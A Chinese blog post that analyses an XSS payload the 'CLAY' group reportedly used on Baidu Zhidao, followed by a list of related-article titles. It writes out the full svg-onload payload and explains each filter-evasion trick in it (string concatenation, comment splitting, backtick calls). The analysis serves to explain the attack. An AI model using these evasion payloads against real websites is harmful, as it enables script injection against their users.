对先前的CLAY对百度知道进行的XSS漏洞的payload进行分析


前情详看我上一篇文章。

我跟进了一下CLAY组织上次的测试,发现那个人代号叫“马克思”。

前段时间曝出了他先前测试的payload(现在已经被删除了,漏洞已修复)。先上图:

PAYLOAD是可以执行的:


那么先简单分析下。

"><svg onload
//上面先闭合,用svg标签,在onload加载项引用js
= "
//换行,=与"间空格
(eval)/**/(top['con'+'firm']
//eval执行字符串,/**/注释分割eval与()
//top拼接confirm弹窗
`WE are CLAY.\nNo system is safe.`)
//换行
//反引号``闭合字符串,而不用"或',也不需要括号了
">< /svg
//换行,闭合
>
//
<!---->
//注释后面

百度知道具体为何没有成功过滤,详情我没有搜集到。
现在这个回答已经被删除了。
他们这种渗透方式挺灰帽的,有了利用点也不破坏,这样应该可以间接提醒官方。

正如他所说啊,真的没有编码。但是知道就这样弹了。
所以没有绝对安全的系统,就是如此吧。
(这次文章就这样水过去了----)

对先前的CLAY对百度知道进行的XSS漏洞的payload进行分析相关推荐

  1. 百度html编辑器 xss,百度ueditor编辑器-xss漏洞

    百度ueditor编辑器 xss漏洞 一.漏洞简介 产品官网下载地址: 涉及版本:php , asp, jsp, net 二.漏洞影响 三.复现过程 漏洞分析 存在漏洞的文件:/php/getCont ...

  2. CLAY黑客组织无聊爆出百度知道漏洞(百度XSS漏洞)

    今天在渗透交流群里面,无意间看到这样一张照片:##百度知道XSS弹窗图 他们这名字就取自电影<我是谁没有绝对安全的系统>啊. 咨询过后,了解到了一些情况. 他在手机上回答百度知道的网友提出 ...

  3. 百度技术沙龙:如何设计优良的日志分析系统

    每次参加完技术交流的会议,都有不少的收获和感触,在这里show一下,等有空的时候再后头看看. 今天下午的技术交流是关于数据分析这块的,正好和我目前方向比较吻合,所以收获不小,使我明晰了接下来公司数据分 ...

  4. php微博 百度文库,新浪微博与百度贴吧移动社交功能的竞品分析

    总结语 新浪微博自创建以来,一直引领社交应用发展并开辟微博时代,在不断发展创新的过程中,新浪微博积累了大量自己的用户并成为社交app的佼佼者.但要想使产品既满足挑剔的用户也满足商业需求仍是微博面临的挑 ...

  5. linux下ping百度报错未知的名称或服务原因分析及yum安装[Errno 14] curl#6 - “Could not resolve host: mirrors.neusoft.edu.cn;

    主要问题 1.yum 安装时出现的问题 http://mirrors.tuna.tsinghua.edu.cn/centos/7.7.1908/os/x86_64/repodata/repomd.xm ...

  6. 百度前100个热门搜索词汇算法思路分析

    题目描述 某搜索引擎,就比如百度,每天的用户搜索词汇是百亿数据量,请设计一种算法,求出每天热门Top100词汇. 思路分析 首先,还是基于哈希分流的思想,用哈希函数,将问题映射到N台分布式计算机上统计 ...

  7. 比葫芦娃还可怕的百度全系APP SDK漏洞 - WormHole虫洞漏洞分析报告

    瘦蛟舞 · 2015/11/02 10:50 作者:瘦蛟舞,蒸米 "You can't have a back door in the software because you can't ...

  8. 2022年11月最新百度网盘扩容技术,扩容技术原理分析拆解

    百度网盘是我们大家喜闻乐见的一个存储网盘,相信有很多人都在用着这个软件,平时我们有一些电影什么的还有其他资源都喜欢往里面存,但是百度网盘的实际容量是有限的,我们有更多的东西要存,网盘官方扩容价格有很高 ...

  9. 百度语音助手实现多回合回话的技术分析

    使用自然语言的自动应答技术是当今的一个发展热点,存在很多技术.如何来构建一个相对智能的提供业务服务支撑的自动应答系统?这需要把多种技术结合起来,共同来实现这一系统.我将根据我以前的相关经验,撰写一个系 ...

最新文章

  1. java整数转二进制字符串_在Java中将int转换为二进制字符串表示形式?
  2. 2015中学计算机考试题,2017年初中信息技术考试试题及答案
  3. 机器学习初学者手抄本:数学基础、机器学习经典算法、统计学习方法等
  4. android5.1移植记录
  5. 你真的需要全栈开发吗?
  6. 关于线程的停止、挂起、退出(修改)
  7. 浅谈PageHelper插件分页实现原理及大数据量下SQL查询效率问题解决
  8. 计算机创新课堂教案,1 1.1计算机概述1.2计算机系统课堂教学教案
  9. C语言_malloc动态开辟内存空间
  10. stata输出四分位、中位数的命令是什么?
  11. Surface pro系统重装
  12. MATLAB 三维立体绘图
  13. 如何与陌生人交谈的技巧
  14. 数据结构 —— 广义表
  15. 面向对象以及三大特性
  16. uni-app使用canvas生成图片并保存到相册
  17. BSCI、SA8000、SEDEXSMETA三项社会责任验厂有何区别?
  18. iOS仿微信聊天输入框、评论输入框
  19. php影视网站主页不显示列表,七星修改米酷影视6.2.8完整版–PHP7.0及以上,修复页面不显示和不能播放等...
  20. office各种插件

热门文章

  1. STM32 FSMC 驱动16脚12864lcd液晶显示屏
  2. deepin20.6安装wine7.0
  3. 菜鸟要飞系列目录(在更)
  4. 【面试】五分钟掌握ABA问题以及解决办法
  5. 为什么要在项目中使用缓存呢?
  6. 爱普生Epson XP-600 一体机驱动
  7. unity-大地图分块加载研究
  8. NC开发软件的错误以及改正
  9. 安川与欧姆龙Plc通讯设置方法
  10. mysql生成千万级测试数据